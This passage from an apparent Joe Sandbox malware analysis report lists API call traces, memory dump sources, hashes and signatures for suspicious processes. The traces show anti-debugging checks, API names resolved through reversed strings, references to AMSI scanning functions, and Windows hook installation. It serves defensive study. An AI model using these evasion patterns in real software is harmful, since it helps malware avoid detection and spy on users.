                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027B358A
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,027B35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027B35BD
                                                                                                                                            • RegCloseKey.ADVAPI32(?,027B35E0,00000000,?,00000004,00000000,027B35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027B35D3
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                            • API String ID: 3677997916-4173385793
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                            • String ID: Kernel32$sserddAcorPteG
                                                                                                                                            • API String ID: 667068680-1372893251
                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,027BAA67,?,?,00000000), ref: 027BA9E8
                                                                                                                                              • Part of subcall function 027BA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027BA762
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,027BAA67,?,?,00000000), ref: 027BAA18
                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 027BAA23
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,027BAA67,?,?,00000000), ref: 027BAA41
                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 027BAA4C
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4102113445-0
                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,027BAC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 027BAAAF
                                                                                                                                              • Part of subcall function 027BA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027BA762
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                                                            • API String ID: 4232894706-1253427255
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc
                                                                                                                                            • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                            • API String ID: 1883125708-1952140341
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(KernelBase,?,027CF3CC,UacInitialize,0281237C,027DB40C,UacScan,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanString), ref: 027CEFCE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027CEFE0
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                            • API String ID: 1646373207-2367923768
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,027DD10B,00000000,027DD11E), ref: 027BC3FA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 027BC40B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                            • API String ID: 1646373207-3712701948
                                                                                                                                            APIs
                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027BE217
                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027BE233
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027BE2AA
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 027BE2D3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 920484758-0
                                                                                                                                            APIs
                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027BACD9
                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027BACFD
                                                                                                                                            • GetModuleFileNameA.KERNEL32(027B0000,?,00000105), ref: 027BAD18
                                                                                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027BADAE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                            APIs
                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027BACD9
                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027BACFD
                                                                                                                                            • GetModuleFileNameA.KERNEL32(027B0000,?,00000105), ref: 027BAD18
                                                                                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027BADAE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,027B955A), ref: 027B94F2
                                                                                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,027B955A), ref: 027B94F8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DateFormatLocaleThread
                                                                                                                                            • String ID: yyyy
                                                                                                                                            • API String ID: 3303714858-3145165042
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027C820E), ref: 027C81F0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                            • String ID: FlushInstructionCache$Kernel32
                                                                                                                                            • API String ID: 3811539418-184458249
                                                                                                                                            APIs
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 027CAD90
                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004), ref: 027CADC0
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000008), ref: 027CADDF
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 027CADEB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Read$Write
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3448952669-0
                                                                                                                                            • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                                            • Instruction ID: 9deca22b1b18740c2ccd779eb9e34647498aa3bc091b75077eea60d711aa7036
                                                                                                                                            • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                                            • Instruction Fuzzy Hash: 5021AFB1A4021D9BDB11DF7ACC81BAE73A9EF40326F108119EE5097384EB34E9119BE0

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:8%
                                                                                                                                            Dynamic/Decrypted Code Coverage:68%
                                                                                                                                            Signature Coverage:10.5%
                                                                                                                                            Total number of Nodes:676
                                                                                                                                            Total number of Limit Nodes:53

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                            • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                            • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                            • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                            • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                            • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                            • _memset.LIBCMT ref: 00401EDD
                                                                                                                                            • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                            • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                            • API String ID: 1430744539-2962942730
                                                                                                                                            • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                            • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                            • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                            • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH]q$PH]q
                                                                                                                                            • API String ID: 0-1166926398
                                                                                                                                            • Opcode ID: a33a71be2a62dfd97b98e02d384bf5ace164ef0f951afb10a42eb9654256caad
                                                                                                                                            • Instruction ID: 2a3644187a4e565755ab609d57dc0ba91db0247db56e4f640831d2c48bd17bb2
                                                                                                                                            • Opcode Fuzzy Hash: a33a71be2a62dfd97b98e02d384bf5ace164ef0f951afb10a42eb9654256caad
                                                                                                                                            • Instruction Fuzzy Hash: 1C81CF74E00218CFDB18DFAAD994A9DBBF2BF89304F20816AD419AB354EB356D45CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3767535563.0000000025B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 25B90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25b90000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                            • Opcode ID: 0d12f2594d5b462dc26513bc59219cab33d0a39a4a6649eb712febd3122d5ff1
                                                                                                                                            • Instruction ID: 3ba60754cc7158ad7c94ef265196bf7622be0ff67acd7283ac8795272225f1d8
                                                                                                                                            • Opcode Fuzzy Hash: 0d12f2594d5b462dc26513bc59219cab33d0a39a4a6649eb712febd3122d5ff1
                                                                                                                                            • Instruction Fuzzy Hash: 11F11C30A00219CFDB08DFA9C984B9DBBF2FF48315F258569E809AB265DB75E945CF40
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c3c00ebee83ea1a9ead1a2b1f0920f160afcdab99e12f42d1d09da9a1085459c
                                                                                                                                            • Instruction ID: a8803628d4909d1fe0c30d52779dba91c6a63d580f0ae9490303c4c656e57e91
                                                                                                                                            • Opcode Fuzzy Hash: c3c00ebee83ea1a9ead1a2b1f0920f160afcdab99e12f42d1d09da9a1085459c
                                                                                                                                            • Instruction Fuzzy Hash: E3F1E574E01218DFDB14DFA9D884B9DBBB2BF88304F50C5A9D808AB355DB74AA85CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: a3808724e501f7f2562f602ad9816b916ad8eccdda0feac9a72621bad6c315af
                                                                                                                                            • Instruction ID: c1803d5a8bdd791abede4e572849b9a817ecaf64cce5f1daa529f62f36e90c93
                                                                                                                                            • Opcode Fuzzy Hash: a3808724e501f7f2562f602ad9816b916ad8eccdda0feac9a72621bad6c315af
                                                                                                                                            • Instruction Fuzzy Hash: EEC14B74A007458FCB08DF69C880A9EBBF6BF49310B108569D80AE7795DB74FD49CB94
                                                                                                                                            APIs
                                                                                                                                            • SetWindowsHookExA.USER32(?,?,?,?), ref: 23F7FDD9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3764023941.0000000023F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 23F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_23f70000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HookWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2559412058-0
                                                                                                                                            • Opcode ID: ee7e797f8d5e56091596acf83d1937f745d21a077ad9015d70cd4bd358551a12
                                                                                                                                            • Instruction ID: 24c7e6df10e66606d1d5e38480ed317f475e700b208a3c467aef74ccd42b8072
                                                                                                                                            • Opcode Fuzzy Hash: ee7e797f8d5e56091596acf83d1937f745d21a077ad9015d70cd4bd358551a12
                                                                                                                                            • Instruction Fuzzy Hash: E9418BB8D012589FCB14DFA9E984A9EFBF5FF49310F10902AE814B7210D734A945CF55
                                                                                                                                            APIs
                                                                                                                                            • SetWindowsHookExA.USER32(?,?,?,?), ref: 23F7FDD9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3764023941.0000000023F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 23F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_23f70000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HookWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2559412058-0
                                                                                                                                            • Opcode ID: 313fae35bcba87ff51313fec82d30b9ed048a5eab5380aa65a79e2d34556c6e9
                                                                                                                                            • Instruction ID: dafb777053fd3d5a17b5d0fa64018a4cb1d560a830ebf04bca9eb5987df5b66a
                                                                                                                                            • Opcode Fuzzy Hash: 313fae35bcba87ff51313fec82d30b9ed048a5eab5380aa65a79e2d34556c6e9
                                                                                                                                            • Instruction Fuzzy Hash: 044179B8D012589FCB14DFA9D984A9EFBF1FF49310F10942AE818B7220D734A945CF55
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LR]q
                                                                                                                                            • API String ID: 0-3081347316
                                                                                                                                            • Opcode ID: a200e875008484ba77700d9cbce7a93857fb9fbdb729686ec52fb1c38d77e698
                                                                                                                                            • Instruction ID: c2cb1f5697be4e1834153dda8c289db2294ec711724d2daa2605a14e32ca448b
                                                                                                                                            • Opcode Fuzzy Hash: a200e875008484ba77700d9cbce7a93857fb9fbdb729686ec52fb1c38d77e698
                                                                                                                                            • Instruction Fuzzy Hash: C8310F70E002199FDB04DFA9D884BEEBBF2BF49304F209469D005B7290D779AA44CF95
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LR]q
                                                                                                                                            • API String ID: 0-3081347316
                                                                                                                                            • Opcode ID: ceb6a19f29425b7deb302f9b8310ac290f4790c059fe65aa49f4475fdce60df5
                                                                                                                                            • Instruction ID: 5f31907cea676a59a760bf7310fc73956b4a4045dcefb621cde81c766f9b17de
                                                                                                                                            • Opcode Fuzzy Hash: ceb6a19f29425b7deb302f9b8310ac290f4790c059fe65aa49f4475fdce60df5
                                                                                                                                            • Instruction Fuzzy Hash: 2F31E270E012199FDB04DFA9D844BEEBBF2BF49304F205469D405B7290D779AA45CF94
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d9762af8de4b1cd3ad09e549811abf6856d78c19b16ee0b2334bb4ba735ecea5
                                                                                                                                            • Instruction ID: 46499f6adc8a8b6ae2e30025f0563616e2522681d92733407af0e63fc916b5c6
                                                                                                                                            • Opcode Fuzzy Hash: d9762af8de4b1cd3ad09e549811abf6856d78c19b16ee0b2334bb4ba735ecea5
                                                                                                                                            • Opcode ID: e6000b0fadcbbd3361e1e87f85c456a958df1a33de5fad686599a315c92ae731
                                                                                                                                            • Instruction ID: 39b82eba183721e37f7ad62588a59a31c8b60cb8a03272f73d15383396a30a43
                                                                                                                                            • Opcode Fuzzy Hash: e6000b0fadcbbd3361e1e87f85c456a958df1a33de5fad686599a315c92ae731
                                                                                                                                            • Instruction Fuzzy Hash: AD81A474E40218DFDB18DFA9D990A9EBBF2BF88304F208529D819A7358DB356945CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d99e11886fe87166b821918ef3507d52ec32e7e7642210dc86d3e7bf9f8fba3a
                                                                                                                                            • Instruction ID: f687be32802254f2681a3928fffd4109ed0cfe0c78283c77481292b799bf8f22
                                                                                                                                            • Opcode Fuzzy Hash: d99e11886fe87166b821918ef3507d52ec32e7e7642210dc86d3e7bf9f8fba3a
                                                                                                                                            • Instruction Fuzzy Hash: CA81A674E40218DFDB14DFA5D990A9EBBF2BF88304F248529D809A7368DB356945CF50
